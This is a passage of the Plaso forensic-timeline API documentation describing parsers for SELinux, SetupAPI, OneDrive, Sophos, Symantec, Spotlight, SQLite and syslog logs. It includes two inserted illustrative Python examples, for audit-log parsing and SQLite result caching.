        Type: str

    pid
        process identifier (PID) that created the SELinux log line.

        Type: int

    DATA_TYPE = 'selinux:line'

class plaso.parsers.selinux.SELinuxParser
    Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

    Parser for SELinux audit log (audit.log) files.

    DATA_FORMAT = 'SELinux audit log (audit.log) file'

    LINE_STRUCTURES = [('line', Dict:({{Group:({{"type" Suppress:("=")} {W:(ABCD...) ^ Re:('UNKNOWN\\[[0-9]+\\]')}}) Group:({{{{{{{"msg" Suppress:("=audit(")} W:(0123...)} Suppress:(".")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:("):")})} Group:({Empty rest of line})}))]

    NAME = 'selinux'

    ParseRecord(parser_mediator, key, structure)
        Parses a structure of tokens derived from a line of a text file.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • key (str) – name of the parsed structure.
            • structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.

        Raises: ParseError – when the structure type is unknown.

    VerifyStructure(parser_mediator, line)
        Verifies if a line from a text file is in the expected format.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • line (str) – line from a text file.

        Returns: True if the line is in the expected format, False if not.

        Return type: bool

plaso.parsers.setupapi module
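The audit line layout described above, worked through as an added example that is not part of plaso: a regular-expression parser (not the pyparsing grammar the module uses) that splits msg=audit(seconds.milliseconds:serial) into its parts, extracts the same fields SELinuxLogEventData carries, and groups records by serial number so that the AVC and SYSCALL lines of one event can be correlated. The sample lines are constructed for this example.

```python
import re
from collections import OrderedDict
from datetime import datetime, timezone

# Constructed sample audit.log content (not plaso test data). The first line is the
# format example from the module description; the last line is deliberately malformed.
SAMPLE_AUDIT_LOG = """\
type=AVC msg=audit(1105758604.519:420): avc: denied { getattr } for pid=5962 comm="httpd" path="/home/auser/public_html" dev=sdb2 ino=921135
type=SYSCALL msg=audit(1105758604.519:420): arch=40000003 syscall=195 success=no exit=-13 pid=5962 comm="httpd"
type=UNKNOWN[1327] msg=audit(1105758605.000:421): proctitle=2F7573722F7362696E2F6874747064
this line does not follow the audit format
"""

# type=<TYPE> msg=audit(<seconds>.<milliseconds>:<serial>): <body>
# TYPE is an upper-case word or UNKNOWN[<number>], as in the parser's LINE_STRUCTURES.
_AUDIT_LINE_RE = re.compile(
    r'^type=(?P<audit_type>[A-Z_]+|UNKNOWN\[[0-9]+\]) '
    r'msg=audit\((?P<seconds>[0-9]+)\.(?P<milliseconds>[0-9]+):(?P<serial>[0-9]+)\):'
    r'(?P<body>.*)$')

_PID_RE = re.compile(r'\bpid=([0-9]+)')


def parse_audit_line(line):
    """Parses one audit.log line into a dict, or returns None if it does not match.

    The dict mirrors SELinuxLogEventData (audit_type, body, pid) and adds the
    timestamp split into seconds and milliseconds, the serial number and a UTC
    datetime built from them.
    """
    match = _AUDIT_LINE_RE.match(line)
    if not match:
        return None
    body = match.group('body').strip()
    pid_match = _PID_RE.search(body)
    seconds = int(match.group('seconds'))
    # The audit subsystem writes exactly three digits after the dot.
    milliseconds = int(match.group('milliseconds'))
    timestamp = datetime.fromtimestamp(seconds, tz=timezone.utc).replace(
        microsecond=milliseconds * 1000)
    return {
        'audit_type': match.group('audit_type'),
        'body': body,
        'pid': int(pid_match.group(1)) if pid_match else None,
        'seconds': seconds,
        'milliseconds': milliseconds,
        'serial': int(match.group('serial')),
        'timestamp': timestamp,
    }


def parse_audit_log(text):
    """Parses every non-empty line; returns (records, number_of_unparsed_lines)."""
    records = []
    unparsed = 0
    for line in text.splitlines():
        if not line.strip():
            continue
        record = parse_audit_line(line)
        if record is None:
            unparsed += 1
        else:
            records.append(record)
    return records, unparsed


def group_by_serial(records):
    """Groups records by serial number, preserving file order within each group.

    Records sharing a serial were emitted for the same kernel event, so the AVC
    denial and its SYSCALL record end up together.
    """
    groups = OrderedDict()
    for record in records:
        groups.setdefault(record['serial'], []).append(record)
    return groups


if __name__ == '__main__':
    parsed, skipped = parse_audit_log(SAMPLE_AUDIT_LOG)
    for serial, group in group_by_serial(parsed).items():
        types = ', '.join(record['audit_type'] for record in group)
        print('{0!s} serial={1:d}: {2:s}'.format(group[0]['timestamp'], serial, types))
    print('unparsed lines: {0:d}'.format(skipped))
```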

Parser for Windows Setupapi log files.

The format is documented at: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/setupapi-text-logs

class plaso.parsers.setupapi.SetupapiLogEventData
    Bases: plaso.containers.events.EventData

    Setupapi log event data.

    entry_type
        log entry type, for example "Device Install - PCIVEN_104C&DEV_8019&SUBSYS_8010104C&REV_003&61aaa01&0&38" or "Sysprep Respecialize - {804b345a-ffd7-854c-a1b5-ca9598907846}".

        Type: str

    exit_status
        the exit status of the logged operation.

        Type: str

    DATA_TYPE = 'setupapi:log:line'

class plaso.parsers.setupapi.SetupapiLogParser
    Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

    Parses events from Windows Setupapi log files.

    DATA_FORMAT = 'Windows SetupAPI log file'

    LINE_STRUCTURES = [('ignorable_line', {{"[Boot Session:" Group:({{{{{{{{{{{W:(0123...) Suppress:("/")} W:(0123...)} Suppress:("/")} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)})} "]"}), ('ignorable_line', {"[BeginLog]" lineEnd}), ('ignorable_line', {"[Device Install Log]" lineEnd}), ('ignorable_line', {{stringStart {" . " | "!!! " | "! " | " "}} rest of line}), ('ignorable_line', {{stringStart {"!!! " | "! " | " "}} rest of line}), ('section_end', {{Suppress:("<<< Section end ") Group:({{{{{{{{{{{W:(0123...) Suppress:("/")} W:(0123...)} Suppress:("/")} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)})} lineEnd}), ('section_end_exit_status', {{{Suppress:("<<< [Exit status: ") !W:(])} "]"} lineEnd}), ('section_header', {{{Suppress:(">>> [") !W:(])} "]"} lineEnd}), ('section_start', {{Suppress:(">>> Section start") Group:({{{{{{{{{{{W:(0123...) Suppress:("/")} W:(0123...)} Suppress:("/")} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)})} lineEnd})]

    NAME = 'setupapi'

    ParseRecord(parser_mediator, key, structure)
        Parses a log record structure and produces events.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • key (str) – identifier of the structure of tokens.
            • structure (pyparsing.ParseResults) – structure of tokens derived from a log entry.

        Raises: ParseError – when the structure type is unknown.

    VerifyStructure(parser_mediator, line)
        Verify that this file is a Windows Setupapi log file.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • line (str) – single line from the text file.

        Returns: True if this is the correct parser, False otherwise.

        Return type: bool

plaso.parsers.skydrivelog module

This file contains the SkyDrive log file parser in plaso.

class plaso.parsers.skydrivelog.SkyDriveLogEventData
    Bases: plaso.containers.events.EventData

    SkyDrive log event data.

    detail
        details.

        Type: str

    log_level
        log level.

        Type: str

    module
        name of the module that generated the log message.

        Type: str

    source_code
        source file and line number that generated the log message.

        Type: str

    DATA_TYPE = 'skydrive:log:line'

class plaso.parsers.skydrivelog.SkyDriveLogParser
    Bases: plaso.parsers.text_parser.PyparsingMultiLineTextParser

    Parses SkyDrive log files.

    DATA_FORMAT = 'OneDrive (or SkyDrive) log file'

    IGNORE_FIELD = Suppress:(!W:(,))

    LINE_STRUCTURES = [('logline', {{{{{{{{{{{{{{{{{{{{{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} Suppress:(",")} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} Suppress:(".")} W:(0123...)} Suppress:(",")} Suppress:(!W:(,))} Suppress:(",")} Suppress:(!W:(,))} Suppress:(",")} Suppress:(!W:(,))} Suppress:(",")} !W:(,)} Suppress:(",")} !W:(,)} Suppress:(",")} Suppress:(!W:(,))} Suppress:(",")} Suppress:(!W:(,))} Suppress:(",")} !W:(,)} Suppress:(",")} SkipTo:({{StringEnd | {Suppress:("######") "Logging started."}} | {{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} Suppress:(",")} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} Suppress:(".")} W:(0123...)}})} [lineEnd]...}), ('header', {{{{{{{{Suppress:("######") "Logging started."} "Version="} W:(0123...)} Suppress:("StartSystemTime:")} Group:({{{{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} W:(0123...)} W:(0123...)} Suppress:(".")} W:(0123...)})} "StartLocalTime:"} SkipTo:(lineEnd)} lineEnd})]

    MSEC = W:(0123...)

    NAME = 'skydrive_log'

    ParseRecord(parser_mediator, key, structure)
        Parse each record structure and return an EventObject if applicable.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • key (str) – identifier of the structure of tokens.
            • structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.

        Raises: ParseError – when the structure type is unknown.

    VerifyStructure(parser_mediator, lines)
        Verify that this file is a SkyDrive log file.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • lines (str) – one or more lines from the text file.

        Returns: True if this is the correct parser, False otherwise.

        Return type: bool

class plaso.parsers.skydrivelog.SkyDriveOldLogEventData
    Bases: plaso.containers.events.EventData

    SkyDrive old log event data.

    log_level
        log level.

        Type: str

    source_code
        source file and line number that generated the log message.

        Type: str

    text
        log message.

        Type: str

    DATA_TYPE = 'skydrive:log:old:line'

class plaso.parsers.skydrivelog.SkyDriveOldLogParser
    Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

    Parse SkyDrive old log files.

    DATA_FORMAT = 'OneDrive (or SkyDrive) old log file'

    LINE_STRUCTURES = [('logline', {{{{Group:({{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)}}) Combine:({{{{!W:(:) ":"} W:(0123...)} "!"} W:(0123...)})} {{Suppress:("(") SkipTo:(")")} Suppress:(")")}} ":"} SkipTo:(lineEnd)}), ('no_header_single_line', {{~{Group:({{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)}})} [Suppress:("->")]} SkipTo:(lineEnd)})]

    NAME = 'skydrive_log_old'

    ParseRecord(parser_mediator, key, structure)
        Parse each record structure and return an EventObject if applicable.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • key (str) – identifier of the structure of tokens.
            • structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.

        Raises: ParseError – when the structure type is unknown.

    VerifyStructure(parser_mediator, line)
        Verify that this file is a SkyDrive old log file.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • line (str) – line from a text file.

        Returns: True if the line is in the expected format, False if not.

        Return type: bool

plaso.parsers.sophos_av module

Sophos Anti-Virus log (SAV.txt) parser.

References: https://community.sophos.com/kb/en-us/110923

class plaso.parsers.sophos_av.SophosAVLogEventData
    Bases: plaso.containers.events.EventData

    Sophos Anti-Virus log event data.

    text
        Sophos Anti-Virus log message.

        Type: str

    DATA_TYPE = 'sophos:av:log'

class plaso.parsers.sophos_av.SophosAVLogParser
    Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

    Parses Sophos Anti-Virus log (SAV.txt) files.

    DATA_FORMAT = 'Sophos Anti-Virus log file (SAV.txt) file'

    LINE_STRUCTURES = [('logline', {Group:({{{W:(0123...) W:(0123...)} W:(0123...)} {{W:(0123...) W:(0123...)} W:(0123...)}}) SkipTo:(lineEnd)})]

    MAX_LINE_LENGTH = 4096

    NAME = 'sophos_av'

    ParseRecord(parser_mediator, key, structure)
        Parses a log record structure and produces events.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • key (str) – identifier of the structure of tokens.
            • structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.

        Raises: ParseError – when the structure type is unknown.

    VerifyStructure(parser_mediator, line)
        Verify that this file is a Sophos Anti-Virus log file.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • line (str) – line from a text file.

        Returns: True if the line is in the expected format, False if not.

        Return type: bool

plaso.parsers.spotlight_storedb module

Parser for Apple Spotlight store database files.

class plaso.parsers.spotlight_storedb.SpotlightStoreDatabaseParser
    Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper.DtFabricHelper

    Parser for Apple Spotlight store database (store.db) files.

    DATA_FORMAT = 'Apple Spotlight store database (store.db) file'

    classmethod GetFormatSpecification()
        Retrieves the format specification.

        Returns: format specification.

        Return type: FormatSpecification

    NAME = 'spotlight_storedb'

    ParseFileObject(parser_mediator, file_object)
        Parses an Apple Spotlight store database file-like object.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – a file-like object.

        Raises: UnableToParseFile – when the file cannot be parsed.

class plaso.parsers.spotlight_storedb.SpotlightStoreMetadataAttribute
    Bases: object

    Metadata attribute.

    key
        key or name of the metadata attribute.

        Type: str

    property_type
        metadata attribute property type.

        Type: int

    value
        metadata attribute value.

        Type: object

    value_type
        metadata attribute value type.

        Type: int

class plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItem
    Bases: object

    Metadata item.

    attributes
        metadata attributes.

        Type: dict[str, SpotlightStoreMetadataAttribute]

    data_size
        size of the record data.

        Type: int

    flags
        record flags.

        Type: int

    identifier
        file (system) entry identifier.

        Type: int

    item_identifier
        item identifier.

        Type: int

    last_update_time
        last update time.

        Type: int

    parent_identifier
        parent file (system) entry identifier.

        Type: int

class plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItemEventData
    Bases: plaso.containers.events.EventData

    Apple Spotlight store database metadata item event data.

    content_type
        content type of the corresponding file (system) entry (kMDItemContentType).

        Type: str

    file_name
        name of the corresponding file (system) entry (_kMDItemFileName).

        Type: str

    file_system_identifier
        file system identifier, for example the catalog node identifier (CNID) on HFS.

        Type: int

    kind
        item kind (kMDItemKind).

        Type: str

    parent_file_system_identifier
        file system identifier of the parent.

        Type: int

    DATA_TYPE = 'spotlight:metadata_item'

plaso.parsers.sqlite module

SQLite parser.

class plaso.parsers.sqlite.SQLiteCache
    Bases: plaso.parsers.plugins.BasePluginCache

    Cache for storing results of SQL queries.

    CacheQueryResults(sql_results, attribute_name, key_name, column_names)
        Build a dictionary object based on a SQL command.

        This function will take a SQL command, execute it and for each resulting row it will store a key in a dictionary.

        An example:

            sql_results = A SQL result object after executing the SQL command: 'SELECT foo, bla, bar FROM my_table'
            attribute_name = 'all_the_things'
            key_name = 'foo'
            column_names = ['bla', 'bar']

        Results from running this against the database:

            'first', 'stuff', 'things'
            'second', 'another stuff', 'another thing'

        This will result in a dictionary object being created in the cache, called 'all_the_things' and it will contain the following value:

            all_the_things = {
                'first': ['stuff', 'things'],
                'second': ['another_stuff', 'another_thing'],
                'third': ['single_thing']}

        Parameters:
            • sql_results (sqlite3.Cursor) – result after executing a SQL command on a database.
            • attribute_name (str) – attribute name in the cache to store results to. This will be the name of the dictionary attribute.
            • key_name (str) – name of the result field that should be used as a key in the resulting dictionary that is created.
            • column_names (list[str]) – list of column names that are stored as values to the dictionary. If this list has only one value in it the value will be stored directly, otherwise the value will be a list containing the extracted results based on the names provided in this list.
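The cache-building rule described above (one column name stores the value directly, several store a list) together with the row cache of GetRowCache, worked through as an added example that is not plaso's own code: it runs the docstring's query against an in-memory sqlite3 copy of my_table (constructed data) and shows how a set of row hashes lets a second pass over the same table, with a row appended as a WAL file would add it, yield only the new row.

```python
import hashlib
import sqlite3


def cache_query_results(sql_results, key_name, column_names):
    """Builds a dictionary from a sqlite3 cursor as CacheQueryResults describes.

    Each row is keyed on the value of the key_name column. With a single entry in
    column_names the value is stored directly; with several, the value is a list
    in that order. A later row with the same key overwrites the earlier one.
    """
    # cursor.description lists the column names of the executed SELECT.
    field_names = [column[0] for column in sql_results.description]
    cache = {}
    for row in sql_results:
        row_dict = dict(zip(field_names, row))
        key = row_dict[key_name]
        if len(column_names) == 1:
            cache[key] = row_dict[column_names[0]]
        else:
            cache[key] = [row_dict[name] for name in column_names]
    return cache


def hash_row(row):
    """Returns a stable digest of a row's values (the idea behind GetRowCache)."""
    return hashlib.sha256(repr(tuple(row)).encode('utf-8')).hexdigest()


def unseen_rows(sql_results, row_cache):
    """Yields only rows whose hash is not yet in row_cache (a set), recording it.

    This is how a row cache lets a plugin skip rows it already produced events
    for when a database is parsed again together with its WAL file.
    """
    for row in sql_results:
        digest = hash_row(row)
        if digest in row_cache:
            continue
        row_cache.add(digest)
        yield row


def build_sample_database():
    """Creates an in-memory copy of the docstring's my_table (constructed rows)."""
    connection = sqlite3.connect(':memory:')
    connection.execute('CREATE TABLE my_table (foo TEXT, bla TEXT, bar TEXT)')
    connection.executemany('INSERT INTO my_table VALUES (?, ?, ?)', [
        ('first', 'stuff', 'things'),
        ('second', 'another stuff', 'another thing')])
    return connection


def demo():
    """Runs both helpers against the sample database and returns the results."""
    connection = build_sample_database()
    query = 'SELECT foo, bla, bar FROM my_table'

    # column_names with two entries: values are lists, as in the docstring.
    all_the_things = cache_query_results(
        connection.execute(query), 'foo', ['bla', 'bar'])
    # column_names with one entry: the value is stored directly.
    only_bar = cache_query_results(connection.execute(query), 'foo', ['bar'])

    row_cache = set()
    first_pass = list(unseen_rows(connection.execute(query), row_cache))
    # Simulate a row that only exists in the WAL file, then parse again.
    connection.execute("INSERT INTO my_table VALUES ('third', 'single', 'thing')")
    second_pass = list(unseen_rows(connection.execute(query), row_cache))
    return all_the_things, only_bar, first_pass, second_pass


if __name__ == '__main__':
    things, bars, first, second = demo()
    print('all_the_things =', things)
    print('only_bar =', bars)
    print('rows seen on first pass:', len(first), 'new rows on second pass:', second)
```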

    GetRowCache(query)
        Retrieves the row cache for a specific query.

        The row cache is a set that contains hashes of values in a row. The row cache is used to find duplicate rows when a database and a database with a WAL file is parsed.

        Parameters: query (str) – query.

        Returns: hashes of the rows that have been parsed.

        Return type: set

class plaso.parsers.sqlite.SQLiteDatabase(filename, temporary_directory=None)
    Bases: object

    SQLite database.

    schema
        schema as an SQL query per table name, for example {'Users': 'CREATE TABLE Users ("id" INTEGER PRIMARY KEY, ...)'}.

        Type: dict[str, str]

    Close()
        Closes the database connection and cleans up the temporary file.

    Open(file_object, wal_file_object=None)
        Opens a SQLite database file.

        Since pysqlite cannot read directly from a file-like object a temporary copy of the file is made. After creating a copy of the database file this function sets up a connection with the database and determines the names of the tables.

        Parameters:
            • file_object (dfvfs.FileIO) – file-like object.
            • wal_file_object (Optional[dfvfs.FileIO]) – file-like object for the Write-Ahead Log (WAL) file.

        Raises:
            • IOError – if the file-like object cannot be read.
            • OSError – if the file-like object cannot be read.
            • sqlite3.DatabaseError – if the database cannot be parsed.
            • ValueError – if the file-like object is missing.

    Query(query)
        Queries the database.

        Parameters: query (str) – SQL query.

        Returns: results.

        Return type: sqlite3.Cursor

        Raises: sqlite3.DatabaseError – if querying the database fails.

    SCHEMA_QUERY = 'SELECT tbl_name, sql FROM sqlite_master WHERE type = "table" AND tbl_name != "xp_proc" AND tbl_name != "sqlite_sequence"'

    property tables
        names of all the tables.

        Type: list[str]

class plaso.parsers.sqlite.SQLiteParser
    Bases: plaso.parsers.interface.FileEntryParser

    Parses SQLite database files.

    DATA_FORMAT = 'SQLite database file'

    classmethod GetFormatSpecification()
        Retrieves the format specification.

        Returns: a format specification or None if not available.

        Return type: FormatSpecification

    NAME = 'sqlite'

    ParseFileEntry(parser_mediator, file_entry)
        Parses a SQLite database file entry.

        Parameters:
            • parser_mediator (ParserMediator) – parser mediator.
            • file_entry (dfvfs.FileEntry) – file entry to be parsed.

        Raises: UnableToParseFile – when the file cannot be parsed.

plaso.parsers.symantec module

This file contains a Symantec parser in plaso.

class plaso.parsers.symantec.SymantecEventData
    Bases: plaso.containers.events.EventData

    Symantec event data.

    access (str) – access.
    action0 (str) – action0.
    action1 (str) – action1.
    action1_status (str) – action1 status.
    action2 (str) – action2.
    action2_status (str) – action2 status.
    address (str) – address.
    backup_id (str) – backup identifier.
    cat (str) – category.
    cleaninfo (str) – clean information.
    clientgroup (str) – client group.
    compressed (str) – compressed.
    computer (str) – computer.
    definfo (str) – definfo.
    defseqnumber (str) – def sequence number.
    deleteinfo (str) – delete information.
    depth (str) – depth.
    description (str) – description.
    domain_guid (str) – domain identifier (GUID).
    domainname (str) – domain name.
    err_code (str) – error code.
    event_data (str) – event data.
    event (str) – event.
    extra (str) – extra.
    file (str) – file.
    flags (str) – flags.
    groupid (str) – group identifier.
    guid (str) – guid.
    license_expiration_dt (str) – license expiration date.
    license_feature_name (str) – license feature name.
    license_feature_ver (str) – license feature ver.
    license_fulfillment_id (str) – license fulfillment identifier.
    license_lifecycle (str) – license lifecycle.
    license_seats_delta (str) – license seats delta.
    license_seats (str) – license seats.
    license_seats_total (str) – license seats total.
    license_serial_num (str) – license serial number.
    license_start_dt (str) – license start date.
    logger (str) – logger.
    login_domain (str) – login domain.
    log_session_guid (str) – log session identifier (GUID).
    macaddr (str) – MAC address.
    new_ext (str) – new ext.
    ntdomain (str) – ntdomain.
    offset (str) – offset.
    parent (str) – parent.
    quarfwd_status (str) – quarfwd status.
    remote_machine_ip (str) – remote machine IP address.
    remote_machine (str) – remote machine.
    scanid (str) – scan identifier.
    snd_status (str) – snd status.
    status (str) – status.
    still_infected (str) – still infected.
    time (str) – time.
    user (str) – user.
    vbin_id (str) – vbin identifier.
    vbin_session_id (str) – vbin session identifier.
    version (str) – version.
    virus_id (str) – virus identifier.
    virus (str) – virus.
    virustype (str) – virustype.

    DATA_TYPE = 'av:symantec:scanlog'

class plaso.parsers.symantec.SymantecParser
    Bases: plaso.parsers.dsv_parser.DSVParser

    Parses Symantec AV Corporate Edition and Endpoint Protection log files.

    COLUMNS = ['time', 'event', 'cat', 'logger', 'computer', 'user', 'virus', 'file', 'action1', 'action2', 'action0', 'virustype', 'flags', 'description', 'scanid', 'new_ext', 'groupid', 'event_data', 'vbin_id', 'virus_id', 'quarfwd_status', 'access', 'snd_status', 'compressed', 'depth', 'still_infected', 'definfo', 'defseqnumber', 'cleaninfo', 'deleteinfo', 'backup_id', 'parent', 'guid', 'clientgroup', 'address', 'domainname', 'ntdomain', 'macaddr', 'version:', 'remote_machine', 'remote_machine_ip', 'action1_status', 'action2_status', 'license_feature_name', 'license_feature_ver', 'license_serial_num', 'license_fulfillment_id', 'license_start_dt', 'license_expiration_dt', 'license_lifecycle', 'license_seats_total', 'license_seats', 'err_code', 'license_seats_delta', 'status', 'domain_guid', 'log_session_guid', 'vbin_session_id', 'login_domain', 'extra']
    DATA_FORMAT = 'AV Corporate Edition and Endpoint Protection log file'
    NAME = 'symantec_scanlog'

    ParseRow(parser_mediator, row_offset, row)
        Parses a line of the log file and produces events.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • row_offset (int) – line number of the row.
            • row (dict[str, str]) – fields of a single row, as specified in COLUMNS.

    VerifyRow(parser_mediator, row)
        Verifies if a line of the file is in the expected format.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • row (dict[str, str]) – fields of a single row, as specified in COLUMNS.
        Returns: True if this is the correct parser, False otherwise.
        Return type: bool

plaso.parsers.syslog module

Parser for syslog formatted log files.

Also see:
    • https://www.rsyslog.com/doc/v8-stable/configuration/templates.html

class plaso.parsers.syslog.SyslogCommentEventData
    Bases: plaso.containers.events.EventData

    Syslog comment event data.

    body (str) – message body.

    DATA_TYPE = 'syslog:comment'

class plaso.parsers.syslog.SyslogLineEventData(data_type='syslog:line')
    Bases: plaso.containers.events.EventData

    Syslog line event data.

    body (str) – message body.
    hostname (str) – hostname of the reporter.
    pid (str) – process identifier of the reporter.
    reporter (str) – reporter.
    severity (str) – severity.

    DATA_TYPE = 'syslog:line'

class plaso.parsers.syslog.SyslogParser
    Bases: plaso.parsers.text_parser.PyparsingMultiLineTextParser

    Parses syslog formatted log files.

    DATA_FORMAT = 'System log (syslog) file'

    EnablePlugins(plugin_includes)
        Enables parser plugins.

        Parameters: plugin_includes (list[str]) – names of the plugins to enable, where None or an empty list represents all plugins. Note that the default plugin is handled separately.

442 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

    LINE_STRUCTURES = [
        ('chromeos_syslog_line', {{{{{{{Combine:({{{{{{{{{{{{{{{W:(0123...) "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} - | +} W:(0123...)} [{":" W:(0123...)}]}) EMERG | ALERT | CRIT | ERR | WARNING | NOTICE | INFO | DEBUG} W:(0123...)} [Suppress:(":")]} [{{Suppress:("[") W:(0123...)} Suppress:("]")}]} [Suppress:(":")]} Re:('.*?(?=($|\\n\\w{3}\\s+\\d{1,2}\\s\\d{2}:\\d{2}:\\d{2})|($|\\n\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s)|($|\\n<\\d{1,3}>1\\s\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s))')} lineEnd}),
        ('kernel_syslog_line', {{{{{{{{{{{W:(ABCD..., abcd...) W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} [{Suppress:(".") W:(0123...)}]} "kernel"} Suppress:(":")} Re:('.*?(?=($|\\n\\w{3}\\s+\\d{1,2}\\s\\d{2}:\\d{2}:\\d{2})|($|\\n\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s)|($|\\n<\\d{1,3}>1\\s\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s))')} lineEnd}),
        ('rsyslog_line', {{{{{{{Combine:({{{{{{{{{{{{{{{W:(0123...) "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} - | +} W:(0123...)} [{":" W:(0123...)}]}) W:(0123...)} W:(0123...)} [{{Suppress:("[") W:(0123...)} Suppress:("]")}]} [{{Suppress:("<") W:(0123...)} Suppress:(">")}]} [Suppress:(":")]} Re:('.*?(?=($|\\n\\w{3}\\s+\\d{1,2}\\s\\d{2}:\\d{2}:\\d{2})|($|\\n\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s)|($|\\n<\\d{1,3}>1\\s\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s))')} lineEnd}),
        ('rsyslog_traditional_line', {{{{{{{{{{{{{{W:(ABCD..., abcd...) W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} [{Suppress:(".") W:(0123...)}]} W:(0123...)} W:(0123...)} [{{Suppress:("[") W:(0123...)} Suppress:("]")}]} [{{Suppress:("<") W:(0123...)} Suppress:(">")}]} [Suppress:(":")]} Re:('.*?(?=($|\\n\\w{3}\\s+\\d{1,2}\\s\\d{2}:\\d{2}:\\d{2})|($|\\n\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s)|($|\\n<\\d{1,3}>1\\s\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s))')} lineEnd}),
        ('rsyslog_protocol_23_line', {{{{{{{{{{{Suppress:("<") W:(0123...)} Suppress:(">")} Suppress:(W:(0123...))} Combine:({{{{{{{{{{{{{{{W:(0123...) "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} - | +} W:(0123...)} [{":" W:(0123...)}]})} W:(0123...)} W:(0123...)} {Suppress:("-") ^ W:(0123...)}} W:(0123...)} W:(0123...)} Re:('.*?(?=($|\\n\\w{3}\\s+\\d{1,2}\\s\\d{2}:\\d{2}:\\d{2})|($|\\n\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s)|($|\\n<\\d{1,3}>1\\s\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s))')} lineEnd}),
